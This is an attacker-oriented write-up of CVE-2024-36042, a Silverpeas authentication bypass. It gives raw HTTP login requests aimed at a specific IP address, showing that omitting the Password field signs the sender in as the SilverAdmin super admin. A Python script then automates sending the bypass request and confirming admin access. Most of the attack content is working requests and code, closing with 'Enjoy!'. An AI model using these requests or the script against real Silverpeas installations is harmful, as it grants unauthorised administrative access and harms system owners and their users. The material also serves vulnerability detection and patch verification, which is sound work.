# CVE-2024-36042 Silverpeas authentication bypass vulnerability
#Silverpeas #vulnerability #authentication #CVE-2024-36042
## First, identify whether the target runs a vulnerable version
All versions prior to 6.3.5 are vulnerable (i.e., version 6.3.4 and earlier). If the Password form field is absent from the login request, the application signs you in as the user named in the Login field without any challenge.
## The standard login request will look like this in Burp Suite:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 49
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&Password=SilverAdmin&DomainId=0
```
This login will fail (unless the default password was never changed) and you will be redirected back to the login page with an error code.
## But if you remove the Password field entirely, like this:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&DomainId=0
```
Then, on a vulnerable version, the login attempt succeeds and redirects you to the main page, logged in as the super admin.

The bug works with any valid user name, but SilverAdmin is the default super admin account, so it is the obvious target.
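The two-request check above (a wrong password must be rejected, the same request without a Password field must be accepted) can be scripted so the result is not confused with a host that still has its default password. The script below is an added example, not the PoC author's code or Silverpeas's own: the login page path, the `ErrorCode` redirect parameter and the target host used in the test are assumptions taken from the write-up, and `post_login` is a hypothetical helper built on `urllib`.

```python
"""Example checker for the CVE-2024-36042 login bypass (added example, not the
PoC author's script). Assumptions: a failed login redirects back to the login
page with an ErrorCode parameter, a successful login redirects elsewhere."""
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Optional, Tuple

AUTH_PATH = "/silverpeas/AuthenticationServlet"
REDIRECTS = {301, 302, 303, 307, 308}


def build_login_body(login: str, domain_id: str = "0",
                     password: Optional[str] = None) -> str:
    """Form body for AuthenticationServlet. password=None reproduces the bypass:
    the Password field is omitted entirely, not sent as an empty value."""
    fields = [("Login", login)]
    if password is not None:
        fields.append(("Password", password))
    fields.append(("DomainId", domain_id))
    return urllib.parse.urlencode(fields)


def classify_redirect(status: int, location: Optional[str]) -> str:
    """Map the servlet's answer onto the two outcomes in the write-up.
    Assumption: a rejected login redirects to a URL carrying ErrorCode."""
    if status not in REDIRECTS or not location:
        return "unexpected"
    if "ErrorCode" in location:
        return "login_failed"
    return "login_succeeded"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib raise HTTPError for the 30x instead of
    # following it, so the Location header can be inspected.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def post_login(base_url: str, body: str) -> Tuple[int, Optional[str]]:
    """Send one login attempt and return (status, Location header)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(
        base_url.rstrip("/") + AUTH_PATH,
        data=body.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # raised for every 30x, see _NoRedirect
        return err.code, err.headers.get("Location")


def is_vulnerable(base_url: str, login: str = "SilverAdmin", domain_id: str = "0",
                  send: Callable[[str, str], Tuple[int, Optional[str]]] = post_login) -> bool:
    """True only when a deliberately wrong password is rejected but omitting
    the field is accepted. A host where both attempts succeed is more likely
    running the default password than exhibiting the missing-field bypass."""
    wrong = classify_redirect(*send(base_url, build_login_body(login, domain_id, "wrong-password")))
    missing = classify_redirect(*send(base_url, build_login_body(login, domain_id)))
    return wrong == "login_failed" and missing == "login_succeeded"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "https://127.0.0.1"
    print("vulnerable" if is_vulnerable(target) else "not confirmed")
```

The `send` parameter exists so the decision logic can be exercised offline against constructed responses; against a live host the default `post_login` is used and only the redirect target is examined, never the page body.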
Enjoy!